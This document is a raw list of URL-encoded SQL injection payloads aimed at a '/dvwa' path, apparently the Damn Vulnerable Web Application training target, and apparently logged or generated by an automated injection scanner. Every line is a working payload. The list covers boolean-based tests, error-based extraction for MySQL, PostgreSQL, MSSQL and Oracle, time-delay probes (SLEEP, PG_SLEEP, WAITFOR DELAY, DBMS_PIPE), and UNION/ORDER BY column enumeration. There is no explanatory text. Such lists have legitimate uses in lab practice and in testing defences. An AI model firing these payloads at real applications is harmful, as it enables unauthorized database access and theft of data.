/dvwa%27%28%22.%28%22.%28%29. 
/dvwa%27dtkO%3C%27%22%3Ekocg 
/dvwa%29%20AND%209197%3D3180%20AND%20%283082%3D3082 
/dvwa%29%20AND%201929%3D1929%20AND%20%289312%3D9312 
/dvwa%20AND%204515%3D4410 
/dvwa%20AND%201929%3D1929 
/dvwa%27%29%20AND%209609%3D7048%20AND%20%28%27nyGf%27%3D%27nyGf 
/dvwa%27%29%20AND%201929%3D1929%20AND%20%28%27cxKc%27%3D%27cxKc 
/dvwa%27%20AND%204108%3D8982%20AND%20%27XICQ%27%3D%27XICQ 
/dvwa%27%20AND%201929%3D1929%20AND%20%27ZiyG%27%3D%27ZiyG 
/dvwa%25%27%20AND%205761%3D8479%20AND%20%27%25%27%3D%27 
/dvwa%25%27%20AND%201929%3D1929%20AND%20%27%25%27%3D%27 
/dvwa%20AND%201658%3D9111--%20cpGI 
/dvwa%20AND%201929%3D1929--%20GsbC 
/%28SELECT%20%28CASE%20WHEN%20%283128%3D7462%29%20THEN%203128%20ELSE%203128%2A%28SELECT%203128%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%29%20END%29%29 
/%28SELECT%20%28CASE%20WHEN%20%288778%3D8778%29%20THEN%208778%20ELSE%208778%2A%28SELECT%208778%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%29%20END%29%29 
/dvwa%29%20AND%20%28SELECT%208023%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7171627071%2C%28SELECT%20%28ELT%288023%3D8023%2C1%29%29%29%2C0x71716b6b71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%289346%3D9346 
/dvwa%20AND%20%28SELECT%208023%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7171627071%2C%28SELECT%20%28ELT%288023%3D8023%2C1%29%29%29%2C0x71716b6b71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 
/dvwa%27%29%20AND%20%28SELECT%208023%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7171627071%2C%28SELECT%20%28ELT%288023%3D8023%2C1%29%29%29%2C0x71716b6b71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%28%27kOhH%27%3D%27kOhH 
/dvwa%27%20AND%20%28SELECT%208023%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7171627071%2C%28SELECT%20%28ELT%288023%3D8023%2C1%29%29%29%2C0x71716b6b71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27exwZ%27%3D%27exwZ 
/dvwa%25%27%20AND%20%28SELECT%208023%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7171627071%2C%28SELECT%20%28ELT%288023%3D8023%2C1%29%29%29%2C0x71716b6b71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27%25%27%3D%27 
/dvwa%20AND%20%28SELECT%208023%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7171627071%2C%28SELECT%20%28ELT%288023%3D8023%2C1%29%29%29%2C0x71716b6b71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29--%20AMMq 
/dvwa%29%20AND%205213%3DCAST%28%28CHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285213%3D5213%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29%20AND%20%286281%3D6281 
/dvwa%20AND%205213%3DCAST%28%28CHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285213%3D5213%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29 
/dvwa%27%29%20AND%205213%3DCAST%28%28CHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285213%3D5213%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29%20AND%20%28%27HGWN%27%3D%27HGWN 
/dvwa%27%20AND%205213%3DCAST%28%28CHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285213%3D5213%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29%20AND%20%27wZMk%27%3D%27wZMk 
/dvwa%25%27%20AND%205213%3DCAST%28%28CHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285213%3D5213%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29%20AND%20%27%25%27%3D%27 
/dvwa%20AND%205213%3DCAST%28%28CHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%285213%3D5213%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%29%20AS%20NUMERIC%29--%20cjla 
/dvwa%29%20AND%208863%3DCONVERT%28INT%2C%28SELECT%20CHAR%28113%29%2BCHAR%28113%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%288863%3D8863%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28107%29%2BCHAR%28113%29%29%29%20AND%20%282995%3D2995 
/dvwa%20AND%208863%3DCONVERT%28INT%2C%28SELECT%20CHAR%28113%29%2BCHAR%28113%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%288863%3D8863%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28107%29%2BCHAR%28113%29%29%29 
/dvwa%27%29%20AND%208863%3DCONVERT%28INT%2C%28SELECT%20CHAR%28113%29%2BCHAR%28113%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%288863%3D8863%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28107%29%2BCHAR%28113%29%29%29%20AND%20%28%27RqDI%27%3D%27RqDI 
/dvwa%27%20AND%208863%3DCONVERT%28INT%2C%28SELECT%20CHAR%28113%29%2BCHAR%28113%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%288863%3D8863%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28107%29%2BCHAR%28113%29%29%29%20AND%20%27oPFD%27%3D%27oPFD 
/dvwa%25%27%20AND%208863%3DCONVERT%28INT%2C%28SELECT%20CHAR%28113%29%2BCHAR%28113%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%288863%3D8863%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28107%29%2BCHAR%28113%29%29%29%20AND%20%27%25%27%3D%27 
/dvwa%20AND%208863%3DCONVERT%28INT%2C%28SELECT%20CHAR%28113%29%2BCHAR%28113%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%288863%3D8863%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28107%29%2BCHAR%28113%29%29%29--%20CVmB 
/dvwa%29%20AND%209784%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289784%3D9784%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%285771%3D5771 
/dvwa%20AND%209784%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289784%3D9784%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29 
/dvwa%27%29%20AND%209784%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289784%3D9784%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%27VSCr%27%3D%27VSCr 
/dvwa%27%20AND%209784%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289784%3D9784%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%27IZDl%27%3D%27IZDl 
/dvwa%25%27%20AND%209784%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289784%3D9784%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%27%25%27%3D%27 
/dvwa%20AND%209784%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289784%3D9784%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29--%20wHAm 
/%28SELECT%206245%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7171627071%2C%28SELECT%20%28ELT%286245%3D6245%2C1%29%29%29%2C0x71716b6b71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29 
/%28SELECT%20CONCAT%280x7171627071%2C%28SELECT%20%28ELT%281037%3D1037%2C1%29%29%29%2C0x71716b6b71%29%29 
/%28SELECT%20%28CHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%286595%3D6595%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%29%29 
/%28SELECT%20CHAR%28113%29%2BCHAR%28113%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%283518%3D3518%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28107%29%2BCHAR%28113%29%29 
/dvwa%29%3B%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29ZFYb%29%23 
/dvwa%3B%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29ZFYb%29%23 
/dvwa%27%29%3B%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29ZFYb%29%23 
/dvwa%27%3B%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29ZFYb%29%23 
/dvwa%25%27%3B%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29ZFYb%29%23 
/dvwa%29%3BSELECT%20PG_SLEEP%285%29-- 
/dvwa%3BSELECT%20PG_SLEEP%285%29-- 
/dvwa%27%29%3BSELECT%20PG_SLEEP%285%29-- 
/dvwa%27%3BSELECT%20PG_SLEEP%285%29-- 
/dvwa%25%27%3BSELECT%20PG_SLEEP%285%29-- 
/dvwa%29%3BWAITFOR%20DELAY%20%270%3A0%3A5%27-- 
/dvwa%3BWAITFOR%20DELAY%20%270%3A0%3A5%27-- 
/dvwa%27%29%3BWAITFOR%20DELAY%20%270%3A0%3A5%27-- 
/dvwa%27%3BWAITFOR%20DELAY%20%270%3A0%3A5%27-- 
/dvwa%25%27%3BWAITFOR%20DELAY%20%270%3A0%3A5%27-- 
/dvwa%29%3BSELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2874%29%7C%7CCHR%28120%29%7C%7CCHR%28115%29%7C%7CCHR%2865%29%2C5%29%20FROM%20DUAL-- 
/dvwa%3BSELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2874%29%7C%7CCHR%28120%29%7C%7CCHR%28115%29%7C%7CCHR%2865%29%2C5%29%20FROM%20DUAL-- 
/dvwa%27%29%3BSELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2874%29%7C%7CCHR%28120%29%7C%7CCHR%28115%29%7C%7CCHR%2865%29%2C5%29%20FROM%20DUAL-- 
/dvwa%27%3BSELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2874%29%7C%7CCHR%28120%29%7C%7CCHR%28115%29%7C%7CCHR%2865%29%2C5%29%20FROM%20DUAL-- 
/dvwa%25%27%3BSELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2874%29%7C%7CCHR%28120%29%7C%7CCHR%28115%29%7C%7CCHR%2865%29%2C5%29%20FROM%20DUAL-- 
/dvwa%29%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29nRRK%29%20AND%20%287518%3D7518 
/dvwa%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29nRRK%29 
/dvwa%27%29%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29nRRK%29%20AND%20%28%27ouxF%27%3D%27ouxF 
/dvwa%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29nRRK%29%20AND%20%27rhIf%27%3D%27rhIf 
/dvwa%25%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29nRRK%29%20AND%20%27%25%27%3D%27 
/dvwa%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29nRRK%29--%20ZysO 
/dvwa%29%20AND%206628%3D%28SELECT%206628%20FROM%20PG_SLEEP%285%29%29%20AND%20%286307%3D6307 
/dvwa%20AND%206628%3D%28SELECT%206628%20FROM%20PG_SLEEP%285%29%29 
/dvwa%27%29%20AND%206628%3D%28SELECT%206628%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%27LhxZ%27%3D%27LhxZ 
/dvwa%27%20AND%206628%3D%28SELECT%206628%20FROM%20PG_SLEEP%285%29%29%20AND%20%27UYIV%27%3D%27UYIV 
/dvwa%25%27%20AND%206628%3D%28SELECT%206628%20FROM%20PG_SLEEP%285%29%29%20AND%20%27%25%27%3D%27 
/dvwa%20AND%206628%3D%28SELECT%206628%20FROM%20PG_SLEEP%285%29%29--%20gRLW 
/dvwa%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27%20AND%20%284388%3D4388 
/dvwa%20WAITFOR%20DELAY%20%270%3A0%3A5%27 
/dvwa%27%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27%20AND%20%28%27pBhY%27%3D%27pBhY 
/dvwa%27%20WAITFOR%20DELAY%20%270%3A0%3A5%27%20AND%20%27FDDK%27%3D%27FDDK 
/dvwa%25%27%20WAITFOR%20DELAY%20%270%3A0%3A5%27%20AND%20%27%25%27%3D%27 
/dvwa%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20rZOn 
/dvwa%29%20AND%206599%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28119%29%7C%7CCHR%2886%29%7C%7CCHR%2877%29%7C%7CCHR%28102%29%2C5%29%20AND%20%287122%3D7122 
/dvwa%20AND%206599%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28119%29%7C%7CCHR%2886%29%7C%7CCHR%2877%29%7C%7CCHR%28102%29%2C5%29 
/dvwa%27%29%20AND%206599%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28119%29%7C%7CCHR%2886%29%7C%7CCHR%2877%29%7C%7CCHR%28102%29%2C5%29%20AND%20%28%27kZBe%27%3D%27kZBe 
/dvwa%27%20AND%206599%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28119%29%7C%7CCHR%2886%29%7C%7CCHR%2877%29%7C%7CCHR%28102%29%2C5%29%20AND%20%27UxRA%27%3D%27UxRA 
/dvwa%25%27%20AND%206599%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28119%29%7C%7CCHR%2886%29%7C%7CCHR%2877%29%7C%7CCHR%28102%29%2C5%29%20AND%20%27%25%27%3D%27 
/dvwa%20AND%206599%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28119%29%7C%7CCHR%2886%29%7C%7CCHR%2877%29%7C%7CCHR%28102%29%2C5%29--%20IRkd 
/dvwa%29%20ORDER%20BY%201--%20- 
/dvwa%29%20UNION%20ALL%20SELECT%20NULL--%20- 
/dvwa%29%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20- 
/dvwa%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20- 
/dvwa%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL--%20- 
/dvwa%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL--%20- 
/dvwa%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20- 
/dvwa%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20- 
/dvwa%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20- 
/dvwa%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20- 
/dvwa%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20- 
/dvwa%20ORDER%20BY%201--%20- 
/dvwa%20UNION%20ALL%20SELECT%20NULL--%20- 
/dvwa%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20- 
/dvwa%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20- 
/dvwa%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL--%20- 
/dvwa%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL--%20- 
/dvwa%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20- 
/dvwa%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20- 
/dvwa%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20- 
/dvwa%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20- 
/dvwa%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20- 
/dvwa%27%29%20ORDER%20BY%201--%20- 
/dvwa%27%29%20UNION%20ALL%20SELECT%20NULL--%20- 
/dvwa%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20- 
/dvwa%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20- 
/dvwa%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL--%20- 
/dvwa%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL--%20- 
/dvwa%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20- 
/dvwa%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20- 
/dvwa%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20- 
/dvwa%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20- 
/dvwa%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20- 
/dvwa%27%20ORDER%20BY%201--%20- 
/dvwa%27%20UNION%20ALL%20SELECT%20NULL--%20- 
/dvwa%27%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20- 
/dvwa%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20- 
/dvwa%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL--%20- 
/dvwa%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL--%20- 
/dvwa%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20- 
/dvwa%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20- 
/dvwa%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20- 
/dvwa%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20- 
/dvwa%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20- 
/dvwa%25%27%20ORDER%20BY%201--%20- 
/dvwa%25%27%20UNION%20ALL%20SELECT%20NULL--%20- 
/dvwa%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20- 
/dvwa%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20- 
/dvwa%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL--%20- 
/dvwa%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL--%20- 
/dvwa%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20- 
/dvwa%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20- 
/dvwa%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20- 
/dvwa%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20- 
/dvwa%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20- 
/dvwa%20ORDER%20BY%201--%20- 
/dvwa%20UNION%20ALL%20SELECT%20NULL--%20- 
/dvwa%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20- 
/dvwa%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20- 
/dvwa%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL--%20- 
/dvwa%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL--%20- 
/dvwa%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20- 
/dvwa%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20- 
/dvwa%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20- 
/dvwa%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20- 
/dvwa%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20- 
/dvwa%29%20ORDER%20BY%201%23 
/dvwa%29%20UNION%20ALL%20SELECT%20NULL%23 
/dvwa%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%23 
/dvwa%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%23 
/dvwa%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%23 
/dvwa%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23 
/dvwa%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 
/dvwa%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 
/dvwa%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 
/dvwa%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 
/dvwa%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 
/dvwa%20ORDER%20BY%201%23 
